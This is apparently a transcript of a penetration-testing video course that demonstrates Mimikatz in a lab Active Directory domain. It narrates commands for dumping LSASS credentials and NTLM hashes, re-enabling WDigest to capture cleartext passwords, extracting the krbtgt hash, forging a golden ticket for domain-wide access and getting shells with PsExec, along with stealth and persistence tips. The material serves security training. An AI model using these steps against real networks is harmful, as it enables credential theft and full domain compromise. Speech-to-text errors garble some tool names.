bring back up Edge is if you go up top to the wiki the wiki is a great place to learn a lot about Mimi cats and what it's capable of and all the different things that it has here uh so please please please look through the different modules that are available to you and exactly what they're doing so from here let's go ahead and I'm going to CD to my downloads folder and then I'm going to go ahead and execute mimicats.exe and it should bring up something that looks just like this so the first thing that we're going to do and this is the first step that you should always do is you should run this privilege and privilege is the module the first part is the module and then we're going to use two colons and then we're going to say divide and we're looking for a privilege 20 okay now debug means that it's allowing us to debug a process that we wouldn't otherwise have access to and this is per the wiki so we're going to attempt to dump some information out of memory right and if we're going to do this we need to be able to bypass this so if we don't we don't have the privilege debug on uh we're not going to be able to bypass these attacks or the memory protections that are in place especially for the LSAT the lsass.exe which we need to bypass protections on that to be able to dump the lsas and take the credentials that are stored there so we're going to run a few attacks against this so the first attack I'm going to show you is a very common attack so we're going to type in s-e-k-u-r-l-s-a and then we're going to do two colons here and we're going to type in log on passwords now for this one I want you to imagine that and not only are we compromising the domain controller here and I'm going to scroll up just a bit but imagine that maybe we just compromised a regular computer now the log on passwords when we dump this for a regular computer are going to show us the computer you see the computer username and the ntlm hash for that as well as any user that has logged in since the last reboot and that's stored here in memory all right so we're we're taking advantage of this stored in memory and say for example you saw earlier with man in the middle six where we actually used a computer to pull down information well it's possible that we have misconfiguration in our environment where a computer is capable of logging into the domain controller and running exploits so it's always good to check this hash and this hashes ntlm not ntl and V2 so we can pass this hash around and try to utilize it in attacks so this would be be taking advantage of Mimi cats past the hash feature so keep that in mind here the other thing that we're looking for is accounts that have logged in so let's scroll down until we find the administrator so the administrator is the only account I've logged in with on this domain controller and we also pull down the administrator's hash so if there was a machine where say for example a domain admin have logged into and it doesn't have to be the domain controller but that domain admin had logged into then we can possibly get their hash and use that to pass around and potentially we could take advantage of this W digest here so what is the W digest well it is a feature that on Windows 7 and before was enabled by default and what it did was it stored your password in clear text thank you windows from Windows 10 on they have patched it or Windows 8 on they attach this and what that means is they just turned it off the features still exist so what can we do we could actually turn on W digest with Mimi cats and then we can go ahead and wait for somebody to log onto the computer so it does require somebody to log off off or log out and then log into the computer but if we're patient or we're waiting through something for a couple days this isn't a bad idea to turn on W digest because that's a registry feature so even if they reboot the computer it's still going to come back on we go in there we wait we find the clear text password and then we're good to go so this is a really really useful uh tool that we can use here or a command that we can use so other commands that we can use and not all of these are going to work but one of them is trying to dump the the Sam so we can just say something like LSA dump and then we could say sam like this and try to dump that and this one doesn't work and that's okay sometimes it doesn't work we could try a Sam we could try patch see if that works that doesn't work okay let's try something else though so backing up just briefly just because we're not able to dump the Sam doesn't mean we're not able to obtain it in other ways we can get a shell with Metasploit and dump the Sam we can use secretstump.pi and dump the Sam we could also just download the Sam and dump it as well so uh just because mimikats can't do it here in this situation doesn't mean it's not something you shouldn't know and it's also something that you should know there's alternative options that you've seen already in the course so the big one that I really want to show you that I'm excited about is this it's LSA dump LSA and then we're going to say patch like this and watch what happens and I should note that the patch is important if you don't put the patch look so happy look what happens here so the patch allows us to actually get to the information so here you can see the information was coming out through an air now here we're actually able to dump the LSA so the LSA briefly is the local security Authority so what that is is a protected subsystem in Windows authentication and it authenticates and creates logon sessions to the local computer well we're on a domain controller and we're dumping the LSA here so this is one option that we can do now the other option is if we want to we can download or try to download the ntds.get remember this file from a long time ago what seems like forever ago in the course the ntds.dit will contain all the credentials as well but what we're looking at here is we're looking at usernames and ntlm hashes guess what we could take these hashes offline and try to crack them and we could try to crack these and this is important why do we do this there's okay there's two reasons we're doing this dump here one is we're going to take these offline try to crack these passwords if we're capable of cracking these passwords we need to know what percentage that we're capable of because you got to think in a real environment we're going to dump probably hundreds of different hashes and we're going to take those we're going to try to crack them and let's say we crack 10 or 30 well that is a number that we can relay back to the client and say look your password policy is either strong or it's weak or somewhere in between right if we're cracking 50 of the passwords we know that that client has a poor password policy if we're only cracking like one or two passwords then their password policy is pretty good and we can kind of identify uh what passwords were weak and how they can improve upon it but it gives a concrete number to the client to say hey look this is how bad your password policy is or how good your password policy is so this is one of the best practices that you will do as a penetration tester the other thing and what we're going to kind of lead into and why I'm showing you Mimi cats is we can run an attack called a Golden Ticket attack and I'm going to cover that in the next video but we need this Kerberos ticket granting ticket to be able to pull that off so we're gonna pause here and this is really the The Rundown for Mimi cats what I'm going to do when we're done with the next video is we're going to have one final video in this active directory section and I'm going to provide you a bunch of resources that are very very good for learning active directory so we'll cover some of the websites and then I'll put them all down in the description below so that way you have references for all these websites and you can go check them out and learn more about active directory pen testing at a deeper level so from here let's go ahead and talk about Golden Ticket attacks and I'll see you in the next video welcome to the last attack for the active directory section this makes me happy and sad because we're gonna have to leave it here so golden ticket is going to be at the attack we're actually going to use a Golden Ticket attack and surprise a pass the ticket attack as well we'll talk about both of those so what is a golden ticket and why do we care well in the last video you saw me dump the krb TGT account right what is that that's the Kerberos ticketing count the ticket granting ticket account that allows us to generate tickets well what if we have the hash of that account then guess who gets to generate Kerberos ticket granny tickets we do so with a Kerberos take a grinding ticket we can request access to any resource or system on the domain using the ticket granting service okay so what does that mean in layman's terms that means when we have a golden ticket we have complete access to the entire domain all the machines we can gain shells on them we can get all the files all the folders Etc so this is such a cool attack here so we're going to go ahead and try to pull this off so let's go ahead and do Mimi cats dot EXE and I'm going to show you the technique that I use when I do this so go ahead and Do Your Privilege debug as always and from here instead of doing the LSA dump LSA patch we're just going to say inject like this and we're going to pull down the actual user we want that way we don't pull down you know all the users we're just going to pull down one user so I'm pulling down by name and the krb TGT account go ahead and hit enter and when you do this go ahead and open up a notepad as well so open up a notepad and we're going to go ahead and scroll up we need a few things we need the Sid of the domain so go ahead and copy that and paste that in here and you need the ntlm hash of the Kerberos ticket granting ticket account so go ahead and copy that paste that in here as well the rest you should be good to go we're going to be able to generate our ticket based off of this so what we're going to do is we're going to do something along the lines of this so we're going to say Kerberos if it'll type Kerberos and golden like that the user here is I always like to put administrator you don't have to you could put fake user fake user123 whatever you want here it doesn't matter I can't type but it doesn't have to be a real user the domain does have to be real so domain here is marvel.local and then we need the Sid of the domain so let's go ahead and grab that and paste it here we also need the Kerberos ticket granny ticket account so krb TGT go ahead and grab that hash that we copied we'll right click there paste that and then we're going to supply the ID so ID of 500 here if it'll work sorry the copy paste messed up we'll do ID of 500. and that just stands for your rid so if you're familiar the rid is the admin account of 500. so we're going to use idea 500 and the last thing we're going to do is we're going to say PTT just like that so what does that stand for that stands for pass the ticket so we're going to generate a golden ticket here and then we're going to use pass the ticket we're going to pass that ticket along to our next session right or the current session and we're going to utilize that ticket to open up a command prompt and that command prompt is going to be able to access any computer we want okay so let's go ahead and do this we're going to pass the ticket generate this go ahead and hit enter and you see it says pass the ticket okay and it says golden ticket for administrator at marvel.local successfully submitted for current session current session so let's go ahead and do something like this miscellaneous and then command okay now we've got this command prompt up and we're utilizing the session and the golden ticket we just created now let's try to say something like dur and we can utilize something like we could try the Punisher let's see if it takes with the name resolution here C dollar sign and look at that we just did a directory of the Punisher uh from our machine we could take this further okay if we have PS exec downloaded to this machine PS exec.exe remember this is a tool used for Windows like this right we we can access computers with PS exec that was the whole intent of PS exec being created so we can download the windows tool of PS exec and gain access to this machine if we want to so that's going to be my challenge to you if you want to have some more fun with this take this a step further and go out go download PS exec so again all you're going to look for is PS exec.exe and that is a Windows tool so you should be able to find it on the Windows site download it and then run PS exec.exe and run it against this computer run it something like this Against The Punisher and then running against command.exe just like that and guess what you're going to get a shell on this machine this is an awesome attack you have complete control on top of this you can think of a golden ticket as persistence once you own the domain controller yes you can go add in a username and you can create your own account make them a domain admin a lot of places will pick up on that not everybody is picking up on the golden ticket quite yet and if you want to get stealthier look into what a silver ticket is that's starting to be the way to go now that golden tickets are starting to get picked up a little bit so what we're going to do is end this here that's my challenge to you go out download PS exec play around with it make this your own go out there and look at more mimikats commands learn all the different little tools and techniques you have the lab built for it everything is ready to roll so I'm going to cover in the next video some good resources for you to study we'll talk about a little bit about certifications and what's out there and then we're going to go ahead and move on and get out of active directory pen testing it has been a fun ride so I'll catch you over in the next video congratulations if you've made it this far you've made it through five hours of hacking material hopefully you found it all useful again if you are interested in checking out our Academy please feel free we do have the all access pass membership we have live training again just as a reminder we have the hacking and defending class coming up on September 16th along with the pmpt accelerated which does start on August 18th and we do have those two certifications we talked about the pjpt or the Practical Junior penetration tester and the pmpt certification both come with training both are around hacking active directory and they're great great certifications so that is it for this video again if you like it please do consider liking the video and subscribing to the channel so we can provide you with more awesome content thank you so much for joining me my name has been Heath Adams AKA The Cyber Mentor peace out